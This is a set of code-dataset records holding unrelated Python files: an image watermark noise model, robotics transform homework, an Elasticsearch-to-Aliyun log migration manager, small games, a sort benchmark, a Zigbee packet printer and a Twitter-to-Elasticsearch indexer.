== \"clean\":\n        def add_text_clean(img):\n            img = img.copy()\n            #image = Image.fromarray(img)\n            #image = image.resize((128,128))\n            return img\n        return add_text_clean\n        #return lambda img: img\n    elif tokens[0] == \"text\":\n        min_occupancy = int(tokens[1])\n        max_occupancy = int(tokens[2])\n\n        def add_text(img):\n            img = img.copy()\n\n            TRANSPARENCY = random.randint(88, 97)\n\n            logo_ran = random.randint(1, num_logo)\n            bigger = random.uniform(1.31, 2)\n\n\n\n            image = Image.fromarray(img)\n\n            watermark = Image.open('./dataset/mark_logo_ran_new/mark_rewrite_{}.png'.format(logo_ran))\n            hei = watermark.size[1]\n            wid = watermark.size[0]\n\n            watermark = watermark.resize((int(wid / bigger), int(hei / bigger)))\n\n            hei = watermark.size[1]\n            wid = watermark.size[0]\n\n\n            if watermark.mode!='RGBA':\n                print(\"in if\")\n                alpha = Image.new('L', watermark.size, 255)\n                watermark.putalpha(alpha)\n\n\n            paste_mask = watermark.split()[3].point(lambda i: i * TRANSPARENCY / 100.)\n\n            hei_i = image.size[1]\n            wid_i = image.size[0]\n\n            #random_W = random.randint(0, wid_i - wid)\n            #random_H = random.randint(0, hei_i - hei)\n\n            #image = image.resize((128,128))\n            #image.paste(watermark, (128 - wid, 128 - hei), mask= paste_mask)\n\n            #if hei_i < wid_i:\n            #    image = image.resize((500, 375))\n            #    image.paste(watermark, (500 - wid, 375 - hei), mask=paste_mask)\n            #else:\n            #    image = image.resize((375, 500))\n            #    image.paste(watermark, (375 - hei, 500 - wid), mask=paste_mask)\n            #print(\"size\")\n            #print(wid_i, hei_i)\n\n            image.paste(watermark, (wid_i - wid , hei_i - hei), mask=paste_mask)\n            #image.paste(watermark, (100 , 100 ), mask=paste_mask)\n            #print(np.shape(image))\n            #return img # when testing, comment out this line and enable line 48\n            return image # when training the model, comment out this line and enable line 47\n\n        return add_text\n    elif tokens[0] == \"impulse\":\n        min_occupancy = int(tokens[1])\n        max_occupancy = int(tokens[2])\n\n        def add_impulse_noise(img):\n            occupancy = np.random.uniform(min_occupancy, max_occupancy)\n            mask = np.random.binomial(size=img.shape, n=1, p=occupancy / 100)\n            noise = 
np.random.randint(256, size=img.shape)\n img = img * (1 - mask) + noise * mask\n return img.astype(np.uint8)\n return add_impulse_noise\n else:\n raise ValueError(\"noise_type should be 'gaussian', 'clean', 'text', or 'impulse'\")\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description=\"test noise model\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--image_size\", type=int, default=256,\n help=\"training patch size\")\n parser.add_argument(\"--noise_model\", type=str, default=\"gaussian,0,50\",\n help=\"noise model to be tested\")\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = get_args()\n image_size = args.image_size\n noise_model = get_noise_model(args.noise_model)\n\n while True:\n image = np.ones((image_size, image_size, 3), dtype=np.uint8) * 128\n noisy_image = noise_model(image)\n cv2.imshow(\"noise image\", noisy_image)\n key = cv2.waitKey(-1)\n\n # \"q\": quit\n if key == 113:\n return 0\n\n\nif __name__ == '__main__':\n main()","sub_path":"noise_model.py","file_name":"noise_model.py","file_ext":"py","file_size_in_byte":4732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"556939560","text":"import numpy as np\n\n\ndef transform2D(dx,dy,R):\n T = np.array([ [ R[0,0] , R[0,1] , dx ],\n [\tR[1,0] , R[1,1] , dy ],\n [\t0.0\t ,\t0.0\t , 1.0 ]]);\n return T;\n\n# Rotation about x axis\ndef rotX(angle):\n m = np.array([ [\t1.0, \t\t0.0\t , 0.0 ],\n [\t0.0, np.cos(angle), -np.sin(angle)],\n [\t0.0, np.sin(angle), np.cos(angle)]]);\n return m;\n\n\n# Rotation about y axis\ndef rotY(angle):\n m = np.array([ [ np.cos(angle), 0.0, np.sin(angle)],\n [ 0.0\t\t , 1.0, \t0.0\t\t ],\n [-np.sin(angle), 0.0, np.cos(angle)]]);\n return m;\n\n# Rotation about z axis\ndef rotZ(angle):\n m = np.array([ [np.cos(angle), -np.sin(angle), 0.0],\n [np.sin(angle), np.cos(angle), 0.0],\n [ 0.0\t\t , \t\t0.0\t\t , 1.0]]);\n return m\n\n\n# convert rotation matrix to normalized quaternion\ndef M2Q(rot):\n m00 = rot[0,0]\n m01 = rot[0,1]\n m02 = rot[0,2]\n m10 = rot[1,0]\n m11 = rot[1,1]\n m12 = rot[1,2]\n m20 = rot[2,0]\n m21 = rot[2,1]\n m22 = rot[2,2]\n\n qw = np.sqrt(1 + m00 + m11 + m22)/2.0\n qx = (m21 - m12)/(4*qw)\n qy = (m02 - m20)/(4*qw)\n qz = (m10 - m01)/(4*qw)\n\n return np.array([qw, qx, qy, qz])\n\ndef q1(idMat):\n print(\"Q1:\")\n print(\"WTA: \")\n move1 = transform2D(2, 0, idMat)\n print(move1)\n print(\"ATB: \")\n ang = rotZ(np.radians(45))\n move2 = transform2D(0, 0, ang)\n print(move2)\n print(\"BTC\")\n move3 = transform2D(.5, 0, idMat)\n print(move3)\n print(\"CTD\")\n ang = rotZ(np.radians(-30))\n move4 = transform2D(0, 0, ang)\n print(move4)\n print(\"DTE\")\n move5 = transform2D(.25, 0, idMat)\n print(move5)\n print(\"WTE\")\n endval = np.dot(np.dot(np.dot(move1, move2), np.dot(move3, move4)), move5)\n print(endval)\n\ndef q2(idMat):\n print(\"Q2:\")\n print(\"WTR: \")\n ang = rotZ(np.pi/6)\n move1 = transform2D(3.5, -.25, ang)\n print(move1)\n print(\"RTL: \")\n ang = rotZ(np.pi/10)\n move2 = transform2D(0.1, 0.0, ang)\n print(move2)\n print(\"LTO: \")\n move3 = transform2D(0.5, 0.0, idMat)\n print(move3)\n print(\"WTO: \")\n endval = np.dot(np.dot(move1, move2), move3)\n print(endval)\n\ndef q3help(num, ang, xyz):\n print()\n print(num, \".)\")\n print(\"Rotation Matrix: \")\n\n if xyz == \"x\":\n rotmat = rotX(ang)\n print(rotmat)\n print(\"Quaternion: \")\n print(M2Q(rotmat))\n\n elif xyz == \"y\":\n rotmat = rotY(ang)\n print(rotmat)\n print(\"Quaternion: 
\")\n print(M2Q(rotmat))\n\n else:\n if xyz == \"z\":\n rotmat = rotZ(ang)\n print(rotmat)\n print(\"Quaternion: \")\n print(M2Q(rotmat))\n\n\ndef q3(idMat):\n print(\"Q3:\")\n q3help(\"a\", 0, \"z\")\n q3help(\"b\", np.pi / 2, \"x\")\n q3help(\"c\", np.pi / 2, \"y\")\n q3help(\"d\", np.pi / 2, \"z\")\n q3help(\"e\", np.pi / 3, \"x\")\n q3help(\"f\", np.pi / 3, \"y\")\n q3help(\"g\", np.pi / 3, \"z\")\n q3help(\"h\", np.pi / 4, \"x\")\n q3help(\"i\", np.pi / 4, \"y\")\n q3help(\"j\", np.pi / 4, \"z\")\n q3help(\"k\", np.pi / 6, \"x\")\n q3help(\"l\", np.pi / 6, \"y\")\n q3help(\"m\", np.pi / 6, \"z\")\n q3help(\"n\", -np.pi / 3, \"x\")\n q3help(\"o\", -np.pi / 3, \"y\")\n q3help(\"p\", -np.pi / 3, \"z\")\n q3help(\"q\", -np.pi / 6, \"x\")\n q3help(\"r\", -np.pi / 6, \"y\")\n q3help(\"s\", -np.pi / 6, \"z\")\n\n\ndef q4():\n print(\"Q4:\")\n m = np.array([[0.747, 0.5430, 0.3826, 0.2528],\n [0.2936, 0.7867, -0.5430, -0.8787],\n [0.5960, 0.2936, 0.7474, -0.4321]])\n print(M2Q(m))\n\n# Convert normalized quaternion to rotation matrix\ndef Q2M(quat):\n qw = quat[0]\n qx = quat[1]\n qy = quat[2]\n qz = quat[3]\n\n m00 = 1-2*qy*qy - 2*qz*qz\n m01 = 2.0*(qx*qy - qz*qw)\n m02 = 2.0*(qx*qz + qy*qw)\n\n m10 = 2.0*(qx*qy + qz*qw)\n m11 = 1-2*qx*qx - 2*qz*qz\n m12 = 2.0*(qy*qz - qx*qw)\n\n m20 = 2.0*(qx*qz - qy*qw)\n m21 = 2.0*(qy*qz + qx*qw)\n m22 = 1-2*qx*qx - 2*qy*qy\n\n return np.array([[ m00, m01, m02], [ m10, m11, m12], [ m20, m21, m22] ])\n\n\ndef q5():\n print(\"Q5:\")\n q = np.array([0.74846, 0.13062, 0.50764, 0.40626])\n print(Q2M(q))\n\ndef q7():\n print(\"Q7:\")\n print(\"A)\")\n # Matt showed me the math for splitting pi/8 into two velocities of direction\n x = np.sin(np.pi/8) * .25\n y = np.cos(np.pi/8) * .25\n print(\"X vel:\", x)\n print(\"Y vel:\", y)\n\n print(\"B)\")\n r = .25 * 10\n c = .258 / 2\n leftR = r + c\n rightR = r - c\n tanSpeedLeft = leftR * .1\n tanSpeedRight = rightR * .1\n\n wheelRad = .0645 / 2\n velLeft = tanSpeedLeft / wheelRad\n velRight = tanSpeedRight / wheelRad\n print(\"Left Speed:\", velLeft)\n print(\"Right Speed:\", velRight)\n\n\nif __name__ == '__main__':\n m = np.array( [[ 1.0, 0.0, 0.0],\n [ 0.0, 1.0, 0.0],\n [\t0.0, 0.0, 1.0]])\n identityMat = np.array([[1.0, 0.0], [0.0, 1.0]])\n q1(identityMat)\n q2(identityMat)\n q3(identityMat)\n q4()\n q5()\n # q6 on hw2_6.py\n q7()\n\n\n\n\n\n\n\n\n\n","sub_path":"Homework1.py","file_name":"Homework1.py","file_ext":"py","file_size_in_byte":5056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"577641113","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n# Copyright (C) Alibaba Cloud Computing\n# All rights reserved.\n\n\nimport logging\nimport time\nfrom multiprocessing import Pool\n\nfrom elasticsearch import Elasticsearch\n\nfrom .. import LogClient, LogException\nfrom ..version import ES_MIGRATION_USER_AGENT\nfrom .collection_task import CollectionTaskStatus, run_collection_task\nfrom .collection_task_config import CollectionTaskConfig\nfrom .index_logstore_mappings import IndexLogstoreMappings\nfrom .mapping_index_converter import MappingIndexConverter\nfrom .util import split_and_strip\n\nresults = []\n\n\ndef log_result(result):\n results.append(result)\n\n\nclass MigrationManager(object):\n \"\"\"\n MigrationManager, migrate data from elasticsearch to aliyun log service\n\n :type hosts: string\n :param hosts: a comma-separated list of source ES nodes. e.g. 
\"localhost:9200,other_host:9200\"\n\n :type indexes: string\n :param indexes: a comma-separated list of source index names. e.g. \"index1,index2\"\n\n :type query: string\n :param query: used to filter docs, so that you can specify the docs you want to migrate. e.g. '{\"query\": {\"match\": {\"title\": \"python\"}}}'\n\n :type scroll: string\n :param scroll: specify how long a consistent view of the index should be maintained for scrolled search. e.g. \"5m\"\n\n :type endpoint: string\n :param endpoint: specify the endpoint of your log services. e.g. \"cn-beijing.log.aliyuncs.com\"\n\n :type project_name: string\n :param project_name: specify the project_name of your log services. e.g. \"your_project\"\n\n :type access_key_id: string\n :param access_key_id: specify the access_key_id of your account.\n\n :type access_key: string\n :param access_key: specify the access_key of your account.\n\n :type logstore_index_mappings: string\n :param logstore_index_mappings: specify the mappings of log service logstore and ES index. e.g. '{\"logstore1\": \"my_index*\", \"logstore2\": \"index1,index2\"}, \"logstore3\": \"index3\"}'\n\n :type pool_size: int\n :param pool_size: specify the size of process pool. e.g. 10\n\n :type time_reference: string\n :param time_reference: specify what ES doc's field to use as log's time field. e.g. \"field1\"\n\n :type source: string\n :param source: specify the value of log's source field. e.g. \"your_source\"\n\n :type topic: string\n :param topic: specify the value of log's topic field. e.g. \"your_topic\"\n\n :type wait_time_in_secs: int\n :param wait_time_in_secs: specify the waiting time between initialize aliyun log and executing data migration task. e.g. 60\n\n :type auto_creation: bool\n :param auto_creation: specify whether to let the tool create logstore and index automatically for you. e.g. 
True\n \"\"\"\n\n def __init__(self, hosts=None, indexes=None, query=None, scroll=\"5m\", endpoint=None, project_name=None,\n access_key_id=None, access_key=None, logstore_index_mappings=None, pool_size=10, time_reference=None,\n source=None, topic=None, wait_time_in_secs=60, auto_creation=True):\n self.hosts = hosts\n self.indexes = indexes\n self.query = query\n self.scroll = scroll\n self.endpoint = endpoint\n self.project_name = project_name\n self.access_key_id = access_key_id\n self.access_key = access_key\n self.logstore_index_mappings = logstore_index_mappings\n self.pool_size = pool_size\n self.time_reference = time_reference\n self.source = source\n self.topic = topic\n self.wait_time_in_secs = wait_time_in_secs\n self.auto_creation = auto_creation\n\n def migrate(self):\n es = Elasticsearch(split_and_strip(self.hosts, \",\"))\n log_client = LogClient(self.endpoint, self.access_key_id, self.access_key)\n log_client.set_user_agent(ES_MIGRATION_USER_AGENT)\n\n index_lst = self.get_index_lst(es, self.indexes)\n index_logstore_mappings = IndexLogstoreMappings(index_lst, self.logstore_index_mappings)\n\n if self.auto_creation:\n self.init_aliyun_log(es, log_client, self.project_name, index_logstore_mappings, self.wait_time_in_secs)\n\n shard_cnt = self.get_shard_count(es, self.indexes, self.query)\n p = Pool(min(shard_cnt, self.pool_size))\n\n for i in range(shard_cnt):\n config = CollectionTaskConfig(task_id=i,\n slice_id=i,\n slice_max=shard_cnt,\n hosts=self.hosts,\n indexes=self.indexes,\n query=self.query,\n scroll=self.scroll,\n endpoint=self.endpoint,\n project=self.project_name,\n access_key_id=self.access_key_id,\n access_key=self.access_key,\n index_logstore_mappings=index_logstore_mappings,\n time_reference=self.time_reference,\n source=self.source,\n topic=self.topic)\n p.apply_async(func=run_collection_task, args=(config,), callback=log_result)\n\n p.close()\n p.join()\n\n return self.logging_summary_info(shard_cnt)\n\n @classmethod\n def logging_summary_info(cls, shard_cnt):\n total_started_task_cnt = shard_cnt\n success_task_cnt = 0\n fail_task_cnt = 0\n doc_cnt = 0\n summary_info = \"\"\n\n logging.info(\"========Tasks Info========\")\n summary_info += \"========Tasks Info========\" + \"\\n\"\n\n for res in results:\n logging.info(res)\n summary_info += str(res) + \"\\n\"\n doc_cnt += res.count\n if res.status == CollectionTaskStatus.SUCCESS:\n success_task_cnt += 1\n else:\n fail_task_cnt += 1\n\n logging.info(\"========Summary========\")\n summary_info += \"========Summary========\" + \"\\n\"\n\n total_started_task_cnt_info = \"Total started task count: %d\" % total_started_task_cnt\n logging.info(total_started_task_cnt_info)\n summary_info += total_started_task_cnt_info + \"\\n\"\n\n success_task_cnt_info = \"Successful task count: %d\" % success_task_cnt\n logging.info(success_task_cnt_info)\n summary_info += success_task_cnt_info + \"\\n\"\n\n fail_task_cnt_info = \"Failed task count: %d\" % fail_task_cnt\n logging.info(fail_task_cnt_info)\n summary_info += fail_task_cnt_info + \"\\n\"\n\n doc_cnt_info = \"Total collected documentation count: %d\" % doc_cnt\n logging.info(doc_cnt_info)\n summary_info += doc_cnt_info + \"\\n\"\n\n return summary_info\n\n @classmethod\n def get_shard_count(cls, es, indexes, query=None):\n resp = es.count(index=indexes, body=query)\n return resp[\"_shards\"][\"total\"]\n\n @classmethod\n def get_index_lst(cls, es, indexes):\n resp = es.indices.stats(index=indexes)\n return resp[\"indices\"].keys()\n\n @classmethod\n def 
init_aliyun_log(cls, es, log_client, project_name, index_logstore_mappings, wait_time_in_secs):\n logging.info(\"Start to init aliyun log\")\n cls._create_logstores(log_client, project_name, index_logstore_mappings)\n cls._create_index_configs(es, log_client, project_name, index_logstore_mappings)\n logging.info(\"Init aliyun log successfully\")\n logging.info(\"Enter wating time, wait_time_in_secs=%d\", wait_time_in_secs)\n time.sleep(wait_time_in_secs)\n logging.info(\"Exit wating time\")\n\n @classmethod\n def _create_logstores(cls, log_client, project_name, index_logstore_mappings):\n logstores = index_logstore_mappings.get_all_logstores()\n for logstore in logstores:\n try:\n log_client.create_logstore(project_name=project_name, logstore_name=logstore)\n except LogException as e:\n if e.get_error_code() == \"LogStoreAlreadyExist\":\n logging.info(\"The logstore %s is already exist, skip the creation step.\", logstore)\n continue\n else:\n raise\n\n @classmethod\n def _create_index_configs(cls, es, log_client, project_name, index_logstore_mappings):\n logstores = index_logstore_mappings.get_all_logstores()\n for logstore in logstores:\n indexes = index_logstore_mappings.get_indexes(logstore)\n first_index = True\n for index in indexes:\n resp = es.indices.get(index=index)\n for mapping in resp[index][\"mappings\"].values():\n index_config = MappingIndexConverter.to_index_config(mapping)\n if first_index:\n try:\n log_client.create_index(project_name, logstore, index_config)\n first_index = False\n except LogException as e:\n if e.get_error_code() == \"IndexAlreadyExist\":\n continue\n else:\n raise\n else:\n log_client.update_index(project_name, logstore, index_config)\n","sub_path":"aliyun/log/es_migration/migration_manager.py","file_name":"migration_manager.py","file_ext":"py","file_size_in_byte":9441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"279557482","text":"import random\n\ntop_of_range = input(\"Enter the Highest Number for Range: \")\n\nif top_of_range.isdigit():\n top_of_range = int(top_of_range)\n if top_of_range <= 0:\n print(\"Please enter a number greater than 0 next time\")\n quit()\nelse :\n print(\"Please enter a number next time\")\n quit()\n\nrandom_number = random.randint(1, top_of_range)\nguesses = 0\nprint(random_number)\nwhile True:\n guesses += 1\n guess = input(\"Make a Guess: \")\n \n if guess.isdigit():\n guess = int(guess)\n if guess <= 0:\n print(\"Please enter a number greater than 0 next time\")\n quit()\n else :\n print(\"Please enter a number next time\")\n quit()\n\n if guess == random_number:\n print(\"Hurrah :)\")\n break\n elif guess < random_number:\n print(\"You were below the Number\")\n elif guess > random_number:\n print(\"You were above the Number\")\n\nprint(\"You got it in\",guesses ,\"guesses\")","sub_path":"Number guessing game.py","file_name":"Number guessing game.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"539355091","text":"from ZbPy import Device\nfrom binascii import hexlify, unhexlify\n\ntry:\n\timport Radio\n\t#Radio.pan(0x1a62)\n\tdev = Device.IEEEDevice(radio=Radio)\n\tnwk = Device.NetworkDevice(dev=dev)\t\nexcept:\n\tprint(\"import Radio failed\")\n\ndef sniff(rx=Radio.rx):\n\twhile True:\n\t\tpkt = rx()\n\t\tif pkt is 
None:\n\t\t\tcontinue\n\t\tfrom ZbPy import IEEE802154  # missing from the module-level imports above\n\t\tprint(IEEE802154.parse(pkt))\n\t\n","sub_path":"ZbPy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"336584895","text":"import random, timeit\n\nMAX_VALUE = 10000 # Max value for size of array to sort\n\ndef insertSort(array):\n    # Begin insertion 1 ahead of first position, we're comparing 0 and i\n    for i in range(1,len(array)):\n\n        currentvalue = array[i]\n        position = i\n\n        while position>0 and array[position-1]>currentvalue:\n            array[position]=array[position-1]\n            position = position-1\n\n        array[position]=currentvalue\n\n# Randomly-generated size of Array\nn = 50000\n\nprint(\"Generating unsorted arrays...\")\nprint(\"========\")\nfor z in range(1, 4):\n    array = []\n    for i in range(1, n):\n        # Append random value to array\n        array.append(random.randint(1, MAX_VALUE))\n\n    print(\"%d) Insertion Sort - Sorting...\" % z)\n    def timeInsertSort():\n        insertSort(array)\n    # Print n size of array, time to sort (seconds)\n    print(\"Sorted [%d] in <%f> seconds \\n\" % (n, timeit.timeit(timeInsertSort, number=100)))\n\nprint(\"========\")","sub_path":"Assignment-1/insertTime.py","file_name":"insertTime.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"40795417","text":"import sys\nimport random\nimport csv\n\nfrom playlist_builder.record_types import *\n\nfrom playlist_builder import fbp_app_min\nfrom playlist_builder import fbp_app_data\nfrom playlist_builder import fbp_app_ml\nfrom playlist_builder.soa_app_min import soa_app_min\nfrom playlist_builder.soa_app_data import soa_app_data\nfrom playlist_builder.soa_app_ml import soa_app_ml\n\nall_apps = {\n    \"fbp_app_min\": {\n        \"description\": \"FBP app that only provides basic functionality.\",\n        \"create_app\": (lambda: fbp_app_min.App())\n    },\n    \"fbp_app_data\": {\n        \"description\": \"FBP app that collects genre statistics.\",\n        \"create_app\": (lambda: fbp_app_data.App())\n    },\n    \"fbp_app_ml\": {\n        \"description\": \"FBP app that only recommends top grossing movies.\",\n        \"create_app\": (lambda: fbp_app_ml.App())\n    },\n    \"soa_app_min\": {\n        \"description\": \"SOA app that only provides basic functionality.\",\n        \"create_app\": (lambda: soa_app_min.App())\n    },\n    \"soa_app_data\": {\n        \"description\": \"SOA app that collects genre statistics.\",\n        \"create_app\": (lambda: soa_app_data.App())\n    },\n    \"soa_app_ml\": {\n        \"description\": \"SOA app that only recommends top grossing movies.\",\n        \"create_app\": (lambda: soa_app_ml.App())\n    }\n}\n\n\nif len(sys.argv) != 2 or sys.argv[1] not in all_apps.keys():\n    print(\"Usage:\")\n    print(\"  python main.py \")\n    print(\"List of available app names: \" + \" , \".join(all_apps.keys()))\n    exit(1)\n\nprint(\"--- Generating data ---\")\nall_movies = []\nall_genres = []\n\nimport pathlib\ndirectory_path = pathlib.Path(__file__).parent.resolve()\nwith open(directory_path.joinpath('movies.csv'), 'r') as f:\n    reader = csv.reader(f)\n    next(reader) # skip header\n    for row in reader:\n        movie = Movie(row[0], row[1], row[2], row[3])\n        all_genres.extend(movie.genres_list)\n        all_movies.append(movie)\nall_genres = list(set(all_genres))\n\nn_requests = 10\nall_requests = []\nfor i in range(n_requests):\n    r = PlaylistRequest(i, random.choice(all_genres), 5)\n    all_requests.append(r)\n\napp_data = all_apps[sys.argv[1]]\napp = app_data[\"create_app\"]()\n\napp.add_data(all_movies, 
all_requests)\nplaylists = app.evaluate()\n\nfor p in playlists:\n print(p)\n","sub_path":"playlist_builder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"8936009","text":"from elasticsearch import Elasticsearch\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nfrom tweepy.streaming import StreamListener\nimport json\nimport sys\n\n# Variables that contains the user credentials to access Twitter API\nconsumer_key=''\nconsumer_secret=''\naccess_token=''\naccess_token_secret=''\n\n\n# This is a listener that appends the tweet text, longitude and latitude to a csv file.\nclass StdOutListener(StreamListener):\n def on_data(self, data):\n if len(host)==0:\n es = Elasticsearch()\n else:\n es = Elasticsearch(host)\n try:\n json_data = json.loads(data)\n tweet = json_data['text']\n id = str(json_data['id'])\n lon = None\n lat = None\n if json_data['coordinates']:\n lon = float(json_data['coordinates']['coordinates'][0])\n lat = float(json_data['coordinates']['coordinates'][1])\n elif 'place' in json_data.keys() and json_data['place']:\n lon = float(json_data['place']['bounding_box']['coordinates'][0][0][0])\n lat = float(json_data['place']['bounding_box']['coordinates'][0][0][1])\n elif 'retweeted_status' in json_data.keys() and 'place' in json_data['retweeted_status'].keys() and json_data['retweeted_status']['place']:\n lon = float(json_data['retweeted_status']['place']['bounding_box']['coordinates'][0][0][0])\n lat = float(json_data['retweeted_status']['place']['bounding_box']['coordinates'][0][0][1])\n elif 'quoted_status' in json_data.keys() and 'place' in json_data['quoted_status'].keys() and json_data['quoted_status']['place']:\n lon = float(json_data['quoted_status']['place']['bounding_box']['coordinates'][0][0][0])\n lat = float(json_data['quoted_status']['place']['bounding_box']['coordinates'][0][0][1])\n if lat and lon:\n es.index(index=index_name, id=id, doc_type=\"tweet\", body={\"tweet\": tweet, \"location\": {\"lat\": lat, \"lon\": lon}})\n except Exception as e:\n print(\"ERROR: \" + str(e))\n\n def on_error(self, status):\n print(status)\n\nif len(sys.argv)<3:\n print (\"Usage\\n\\npython live_elastic_search.py \\n\")\nif __name__ == '__main__':\n # This handles Twitter authetification and the connection to Twitter Streaming API\n l = StdOutListener()\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n stream = Stream(auth, l)\n index_name = sys.argv[1]\n host = [sys.argv[2]] if sys.argv[2]!=\"\" else []\n stream.filter(languages=['en'], track=['starbucks','android','national geographic','pets','music'])\n","sub_path":"live_elastic_search.py","file_name":"live_elastic_search.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"570923879","text":"# Copyright (c) 2020 Anastasiia Birillo, Elena Lyulina\n\nimport pytest\n\nfrom src.main.util.consts import TASK\nfrom src.test.test_config import to_skip, TEST_LEVEL\nfrom src.main.solution_space.data_classes import User, CodeInfo\nfrom src.main.solution_space.consts import SOLUTION_SPACE_TEST_FOLDER\nfrom src.main.solution_space.solution_graph import Vertex, SolutionGraph\n\nCURRENT_TASK = TASK.PIES\nSolutionGraph.solution_space_folder = SOLUTION_SPACE_TEST_FOLDER\n\n\n@pytest.mark.skipif(to_skip(current_module_level=TEST_LEVEL.SOLUTION_SPACE), 
reason=TEST_LEVEL.SOLUTION_SPACE.value)\nclass TestVertex:\n\n    def test_adding_parent(self) -> None:\n        sg = SolutionGraph(CURRENT_TASK)\n        child = Vertex(sg)\n        parents_len = 100\n        parents = [Vertex(sg) for _ in range(parents_len)]\n        for parent in parents:\n            child.add_parent(parent)\n            assert parent.children == [child]\n        assert child.parents == parents\n\n    def test_adding_children(self) -> None:\n        sg = SolutionGraph(CURRENT_TASK)\n        parent = Vertex(sg)\n        children_len = 100\n        children = [Vertex(sg) for _ in range(children_len)]\n        for child in children:\n            parent.add_child(child)\n            assert child.parents == [parent]\n        assert parent.children == children\n\n    @pytest.mark.skip(reason='There is no code info in the vertex now')\n    def test_adding_code_info(self) -> None:\n        sg = SolutionGraph(CURRENT_TASK)\n        vertex = Vertex(sg)\n        code_info_list_len = 100\n        code_info_list = [CodeInfo(User()) for _ in range(code_info_list_len)]\n        for code_info in code_info_list:\n            vertex.add_code_info(code_info)\n        assert vertex.code_info_list == code_info_list\n\n    @pytest.mark.skip(reason='There is no code info in the vertex now')\n    def test_getting_unique_users(self) -> None:\n        users = [User(), User(), User()]\n        users_dist = [3, 0, 20]\n        code_info_list = []\n        # Create code_info_list with users distribution\n        for i, dist in enumerate(users_dist):\n            for j in range(dist):\n                code_info_list.append(CodeInfo(users[i]))\n        assert len(code_info_list) == sum(users_dist)\n\n        sg = SolutionGraph(CURRENT_TASK)\n        vertex = Vertex(sg)\n        for code_info in code_info_list:\n            vertex.add_code_info(code_info)\n\n        # In result set will be only two users from three because the second one has 0 code_info\n        assert vertex.get_unique_users() == {users[0], users[2]}\n","sub_path":"src/test/solution_space/vertex/vertex_test.py","file_name":"vertex_test.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"454379256","text":"# Pygame sprite Example\nimport pygame\nimport random\nfrom settings import *\n\n\ndef draw_grid():\n    for x in range(0, WIDTH, GRIDSIZE):\n        pygame.draw.line(screen, GREEN, (x, 0), (x, HEIGHT))\n    for y in range(0, HEIGHT, GRIDSIZE):\n        pygame.draw.line(screen, GREEN, (0, y), (WIDTH, y))\n\n\nclass Tile(pygame.sprite.Sprite):\n    # sprite for the Tiles\n    def __init__(self, xloc, yloc):\n        # this line is required to properly create the sprite\n        pygame.sprite.Sprite.__init__(self)\n        # create a plain rectangle for the sprite image\n        self.size = 118\n        self.offset = 5\n        self.image = pygame.Surface((self.size, self.size))\n        self.image.fill(DARK_BLUE)\n        # find the rectangle that encloses the image\n        self.rect = self.image.get_rect()\n        # center the sprite on the screen\n        self.rect.center = (xloc + self.size / 2 + self.offset, yloc + self.size / 2 + self.offset)\n\n    def update(self):\n        # any code here will happen every time the game loop updates\n        pass\n\n\nclass Focus(pygame.sprite.Sprite):\n    # sprite for the Tiles\n    def __init__(self, focxloc, focyloc):\n        # this line is required to properly create the sprite\n        pygame.sprite.Sprite.__init__(self)\n        # create a plain rectangle for the sprite image\n        self.size = 118\n        self.offset = 5\n        self.image = pygame.Surface((self.size, self.size))\n        self.image.fill(GREEN)\n        # find the rectangle that encloses the image\n        self.rect = self.image.get_rect()\n        self.focxloc = focxloc\n        self.focyloc = focyloc\n        # center the sprite on the screen\n        self.rect.center = (focxloc + self.size / 2 + self.offset, focyloc + self.size / 2 + 
self.offset)\n\n    def update(self):\n        pygame.draw.rect(screen, GREEN, (self.focxloc, self.focxloc + 200, self.focyloc, self.focyloc + 400), 4)\n\n\n# initialize pygame and create window\npygame.init()\npygame.mixer.init()\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n\npygame.display.set_caption(\"Tile Game\")\nclock = pygame.time.Clock()\n\nall_sprites = pygame.sprite.Group()\nfor xloc in range(0, WIDTH, GRIDSIZE):\n    for yloc in range(0, HEIGHT, GRIDSIZE):\n        tile = Tile(xloc, yloc)\n        all_sprites.add(tile)\nfocus = Focus(128, 128)\nall_sprites.add(focus)\n# Game loop\nx = 0\nrunning = True\nwhile running:\n    # keep loop running at the right speed\n    clock.tick(FPS)\n    # Process input (events)\n    for event in pygame.event.get():\n        # check for closing window\n        if event.type == pygame.QUIT:\n            running = False\n\n    # Update\n    all_sprites.update()\n\n    # Draw / render\n    screen.fill(BLACK)\n    draw_grid()\n    focus.update()\n\n    all_sprites.draw(screen)\n    # *after* drawing everything, flip the display\n    pygame.display.flip()\n\npygame.quit()\n","sub_path":"early archive/TileGame000.py","file_name":"TileGame000.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"433317766","text":"import time\n\ntime.sleep(3.0)\n\nprint ('Hello! I am a new computer programme created by Matt Addicott')\n\ntime.sleep(3.0)\n\nprint ('\\nhe is a clever chap after all')\n\ntime.sleep(3.0)\n\nprint ('that clever in fact that, if your looking to hire someone.....')\ntime.sleep (2.0)\n\nprint ('just saying, thats all')\n\ntime.sleep 